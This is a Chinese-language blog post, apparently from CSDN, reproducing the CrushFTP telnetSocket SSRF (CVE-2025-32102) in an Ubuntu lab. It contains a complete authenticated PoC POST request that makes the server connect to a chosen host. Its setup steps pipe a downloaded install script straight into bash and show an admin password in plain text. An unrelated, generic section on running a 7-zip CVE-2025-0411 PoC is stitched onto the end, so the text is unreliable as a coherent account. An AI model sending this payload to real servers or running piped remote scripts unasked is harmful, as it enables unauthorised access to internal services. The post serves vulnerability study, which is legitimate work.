CVE-2025-32102 | Ubuntu 下复现 CrushFTP telnetSocket接口SSRF


1. 漏洞描述


CrushFTP是CrushFTP公司的一款文件传输服务器。

影响版本:CrushFTP 9.x 和 10.x 到 10.8.4 以及 11.x 到 11.3.1

2. POC


POST /WebInterface/function/ HTTP/1.1
Host: 192.168.119.144:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: http://192.168.119.144:8080/WebInterface/admin/index.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: currentAuth=DGfv; CrushAuth=1745390781868_uEmj17c4A6ypnRJCnZGXDj7wWEDGfv
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 101

command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080&random=0.17159638175272862&c2f=DGfv

在这里插入图片描述

host参数的内容也可以是其他域名,查看域名的DNS解析记录即可确认是否访问成功。



3. Ubuntu 搭建环境


这里选择在 Ubuntu 中搭建 CrushFTP 11。

执行安装脚本:
wget -O - https://www.crushftp.com/crush11wiki/attach/Linux%20Install/configure.sh | bash
在这里插入图片描述


记住这个密码:‘crushadmin’ password = m4M7QsAe

(在 configure.sh 中设置了给 crushadmin 用户生成一个随机的密码。这里可以更改这个脚本,让生成的用户的密码是固定的,也可以后面再执行命令更改这个用户的密码。)



查看java版本,CrushFTP11 需要 Java17+:`java --version`

如果版本不符合,则执行下面的命令安装 JDK21:

wget https://download.java.net/java/GA/jdk21.0.1/415e3f918a1f4062a0074a2794853d0d/12/GPL/openjdk-21.0.1_linux-aarch64_bin.tar.gz
tar -xvf openjdk-21.0.1_linux-aarch64_bin.tar.gz
/bin/rm openjdk-21.0.1_linux-aarch64_bin.tar.gz
mv jdk-21* /var/opt/CrushFTP11/Java


进入 CrushFTP 的目录中 /var/opt/CrushFTP11(configure.sh 脚本中设置了将会安装在这个目录中),执行命令检查 init 脚本是否检测到它:./crushftp_init.sh info

在这里插入图片描述



启动 CrushFTP:./crushftp_init.sh start
在这里插入图片描述
(停止 CrushFTP 的命令:./crushftp_init.sh stop



生成 Admin 用户:./Java/bin/java -jar CrushFTP.jar -a "crushadmin" "123456"
这将创建一个新用户,并将其写入默认位置:用户/MainUsers/crushadmin/

现在,通过浏览器登录到管理控制台:

http://your_ip:8080/
https://your_ip:443/

用户名:crushadmin
密码:123456


在这里插入图片描述



### 复现 CVE-2025-0411 7-zip 漏洞 为了成功复现CVE-2025-0411漏洞,需遵循一系列精确的操作流程。此漏洞存在于7-zip软件中,利用了处理特定构造文件时存在的缺陷。 #### 准备工作环境 确保拥有一个安全隔离的测试环境至关重要,建议在一个专门用于实验的安全沙箱内操作。这可以防止潜在风险扩散到生产环境中[^2]。 #### 获取必要的工具和资源 访问GitHub仓库`https://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC.git`下载针对该漏洞的概念验证(PoC)代码。通过克隆上述链接中的项目获取所需材料。 ```bash git clone https://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC.git cd 7-Zip-CVE-2025-0411-POC/ ``` #### 安装受影响版本的应用程序 安装易受攻击的具体版本7-zip应用程序,在执行任何进一步步骤之前确认已正确设置目标应用及其依赖项。 #### 执行PoC脚本 按照README文档指示运行所提供的Python脚本来触发漏洞行为并观察其效果。通常情况下会有一个简单的命令行指令来启动测试过程: ```bash python exploit.py ``` 请注意,实际输出可能因具体实施细节而异;务必参照官方说明进行调整以适应不同场景下的需求。 #### 验证结果 一旦完成以上各阶段的工作,则应该能够看到预期的结果——即证明存在描述的安全隐患。然而重要的是要记住仅限于合法授权范围内开展此类活动,并始终采取适当措施保护个人隐私与数据安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值